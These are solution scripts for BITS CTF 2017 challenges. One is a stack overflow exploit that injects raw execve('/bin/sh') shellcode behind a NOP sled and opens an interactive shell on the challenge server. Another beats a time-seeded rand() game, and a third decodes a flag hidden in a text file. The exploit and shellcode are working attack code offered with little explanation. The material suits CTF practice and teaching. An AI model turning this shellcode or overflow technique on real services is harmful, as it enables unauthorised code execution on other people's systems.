BITS CTF 2017

cmdline_exploit.py

#! /usr/bin/env python3


import sys
import struct
from telnetlib import Telnet

def p64(addr):
    return struct.pack('<Q', addr)

def exploit(tn):
    stack = int(tn.read_some()[0:14],16)
    payload  = b'AAAAAAAAAAAAAAAAAAAAAAAA'
    sc = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
    payload += p64(stack+128)
    payload += b'\x90'*256
    payload += sc
    
    tn.write(payload)

    tn.interact()


def main(argc, argv):
    if argc != 2:
        print('python {} l|r'.format(argv[0]))
        sys.exit(1)

    if argv[1] == 'r':
        tn = Telnet('bitsctf.bits-quark.org', 1330)
        exploit(tn)
    else:
        tn = Telnet('localhost', 1330)
        exploit(tn)


if __name__ == '__main__':
    main(len(sys.argv), sys.argv)

randomgame_solve.py

from ctypes import *
from telnetlib import Telnet


def exploit(tn):
    
    libc = CDLL("libc.so.6")
    time = libc.time()
    libc.srand(time)

    for i in range(0, 30):
        tn.read_until(b'round : ')
        val = libc.rand() & 15
        tn.write(str(val).encode() + b'\n')

        
    tn.interact()

def main():
    tn = Telnet('bitsctf.bits-quark.org', 1335)
    exploit(tn)



if __name__ == '__main__':
    main()

sherlock_solve.py

#! /usr/bin/env python3

import binascii
import sys


def main():
    with open('final.txt', 'r') as f:
        data = f.read()

    table = {}
    string = ''
    
    for i in range(0, len(data)):
        if data[i].isupper():
            if data[i] in table.keys():
                table[data[i]] += 1
            else:
                table[data[i]] = 1
            string += data[i]

    string = string.replace('ZERO', '0')
    string = string.replace('ONE', '1')

    data = int(string, 2)
    flag = binascii.unhexlify('%x' % data).decode()
    
    print(flag)
            
    
                

if __name__ == '__main__':
    main()